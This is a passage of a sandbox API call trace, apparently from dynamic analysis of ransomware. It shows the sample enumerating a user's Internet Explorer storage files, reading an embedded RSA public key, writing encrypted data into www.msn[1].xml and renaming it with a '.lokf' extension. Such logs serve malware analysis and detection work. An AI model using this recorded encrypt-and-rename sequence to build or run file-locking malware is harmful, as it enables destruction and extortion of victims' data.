lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.421] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.421] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.421] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.421] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.421] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\") returned="VGMTOI09\\" [0061.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0061.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0061.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0061.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.422] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.422] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.422] PathFindFileNameW (pszPath="") returned="" [0061.422] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.422] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.422] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 1 [0061.422] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned=".xml" [0061.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.423] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=836) returned 1 [0061.423] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.426] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x31e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.426] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.427] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x344, lpOverlapped=0x0) returned 1 [0061.427] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.427] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.427] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.427] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0061.428] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.428] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.428] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.428] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.428] GetLastError () returned 0x0 [0061.428] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.428] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0061.428] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.428] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.428] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.428] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.428] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.429] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x344, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.429] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0061.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0061.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0061.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0061.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.429] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0061.429] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0061.429] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.429] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.429] CloseHandle (hObject=0x5cc) returned 1 [0061.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xe0) returned 0x32652c0 [0061.429] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8f0) returned 0x326aa18 [0061.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32652c0 | out: hHeap=0x660000) returned 1 [0061.430] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.lokf")) returned 1 [0061.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0061.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.430] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.431] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.431] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 0 [0061.431] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.431] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0061.431] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228eb8 | out: hHeap=0x660000) returned 1 [0061.431] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262b28 [0061.431] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.431] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.431] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.431] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.431] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.431] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.431] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.432] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.433] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.434] HeapFree (in: 